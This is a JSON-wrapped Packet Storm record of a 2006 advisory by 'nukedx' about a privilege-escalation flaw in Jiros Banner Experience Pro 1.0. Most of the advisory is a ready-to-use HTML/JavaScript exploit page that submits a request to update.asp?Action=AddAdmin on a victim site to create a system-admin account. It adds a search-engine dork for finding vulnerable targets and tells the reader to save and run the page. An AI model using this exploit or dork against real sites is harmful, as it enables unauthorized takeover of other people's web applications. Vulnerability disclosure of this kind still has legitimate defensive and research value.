{"id": "PACKETSTORM:44533", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Jiros.txt", "description": "", "published": "2006-03-10T00:00:00", "modified": "2006-03-10T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/44533/Jiros.txt.html", "reporter": "Mustafa Can Bjorn", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:26:32", "viewCount": 10, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/44533/Jiros.txt", "sourceData": "`--Security Report-- \nAdvisory: Jiros Banner Experience Pro Remote Privilege Escalation. \n--- \nAuthor: Mustafa Can Bjorn \"nukedx a.k.a nuker\" IPEKCI \n--- \nDate: 07/03/06 04:52 AM \n--- \nContacts:{ \nICQ: 10072 \nMSN/Email: nukedx@nukedx.com \nWeb: http://www.nukedx.com \n} \n--- \nVendor: Jiros (http://www.jiros.net) \nVersion: 1.0 and prior versions must be affected. \nAbout: Via this method a remote attacker can bypass the system's security control \nand edit all options. \nLevel: Critical \n--- \nHow&Example: \nThe security control in the admin panel's index is not sanitized properly. \nGET/EXAMPLE -> http://[victim]/[JBPSDir]/files/ with this example a remote attacker \nbypasses the security control, \nbut s/he will get some errors because s/he is not logged in to the system and does not \nhave admin cookies, so let's add a new \nadmin account :) \nGET/EXAMPLE -> http://[victim]/[JBPSDir]/files/addadmin.asp so with this example \na remote attacker can create an admin account \nsuccessfully and, after logging in via http://[victim]/[JBPSDir]/files/login.asp, can \ntake control of the whole system. \n--- \nTimeline: \n* 07/03/2006: Vulnerability found. \n* 07/03/2006: Contacted the vendor; waiting for a reply. \n--- \nExploit: \nhttp://www.nukedx.com/?getxpl=19 \nWith this exploit a remote attacker can create a new admin account. 
\n \n<html> \n<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title> \n<body bgcolor=\"#000000\"> \n<style> \n.xpl {font-family:tahoma; font-size:11px; text-decoration: none;} \n</style> \n<script language=\"JavaScript\"> \nfunction jbxpl() { \nif (document.xplt.victim.value==\"\") { \nalert(\"Please enter site!\"); \nreturn false; \n} \nif (confirm(\"Are you sure?\")) { \nxplt.action=\"http://\"+document.xplt.victim.value+\"files/update.asp?Action=AddAdmin\"; \nxplt.aName.value=document.xplt.aName.value; \nxplt.aEmail.value=document.xplt.aEmail.value; \nxplt.aPassword.value=document.xplt.aPassword.value; \nxplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value; \nxplt.aIsActive=document.xplt.aIsActive.value; \nxplt.submit(); \n} \n} \n</script> \n<strong> \n<font class=\"xpl\" color=\"#00FF40\"> \n<pre> \n<center> \nWelcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit \nThis exploit has been coded by nukedx \nYou can found original advisory on http://www.nukedx.com/?viewdoc=19 \nDork for this exploit: <u>inurl:JBSPro</u> \nYour target must be like that: www.victim.com/Path/ \nThe sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp \nIf the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/ \nFor second example your target must be www.victim.com/ \nYou can login with your admin account via www.victim.com/JBSPath/files/login.asp \nHave phun \n<form name=\"xplt\" method=\"POST\" onsubmit=\"jbxpl();\"> \nTarget -> <input type=\"text\" name=\"victim\" value=\"www.victim.com/Path/\" size=\"44\" class=\"xpl\"> \n<input type=\"text\" name=\"aName\" value=\"Enter Username\" class=\"xpl\" size=\"30\"> \n<input type=\"text\" name=\"aEmail\" value=\"Enter Email\" class=\"xpl\" size=\"30\"> \n<input type=\"text\" name=\"aPassword\" value=\"Enter Password\" class=\"xpl\" size=\"30\"> \n<input type=\"hidden\" name=\"aIsSystemAdmin\" value=\"True\"> \n<input type=\"hidden\" 
name=\"aIsActive\" value=\"True\"> \n<input type=\"submit\" value=\"Send\" class=\"xpl\"> \n</form> \n</pre> \n</font> \n</strong> \n</body> \n</html> \n \nSave this code as .htm and then execute. \n \n# nukedx.com [2006-03-07] \n \n \n \n--- \nDorks: \ninurl:JBSPro \n--- \nOriginal advisory: http://www.nukedx.com/?viewdoc=19 \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645419206}}